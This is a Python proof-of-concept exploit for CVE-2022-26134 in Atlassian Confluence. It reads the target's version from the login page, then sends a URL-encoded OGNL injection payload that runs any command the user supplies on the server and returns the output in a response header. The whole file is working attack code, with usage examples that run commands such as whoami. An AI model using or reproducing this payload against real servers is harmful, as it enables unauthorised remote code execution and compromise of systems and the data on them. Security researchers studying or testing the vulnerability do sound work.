exploit.py

#Libraries
#---------------------------------
import requests
import argparse
import re
import sys
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings()
#---------------------------------


def send_payload(host, command):
    print("Executing Payload...\n")
    response = requests.get("{}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/".format(host, command), verify=False, allow_redirects=False)
    
    if(response.status_code == 302):
        return response.headers['X-Cmd-Response']
    else:
        print("Exploit Failed")
        return False

def check_version(host):
  print("Searching for target version\n")
  response = requests.get("{}/login.action".format(host), verify=False)
  if response.status_code == 200:
    filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
    if(len(filter_version) >= 1):
      version = filter_version[0].split("'>")[1].split('</')[0]
      return version
    else:
      return False
  else:
    return host


if(len(sys.argv) < 3):
  #Print Usage
  print("\n---CVE-2022-26134 Exploit PoC by shamoo0---\n\n")
  print("Usage:")
  print("{} https://target.com cmd".format(sys.argv[0]))
  print("ex: {} https://confluence.com whoami".format(sys.argv[0]))
  print("ex: {} https://confluence.com 'ls -la'".format(sys.argv[0]))

else:
  target = sys.argv[1]
  cmd = sys.argv[2]
  version = check_version(target) #Checks Target Version
  if version :
    print("Target version found!\n")
    print("Confluence target version: {}".format(version))
  else:
    print("Can't find the used version for this target")
  exec_payload = send_payload(target, cmd) #Executes Payload
  print(exec_payload)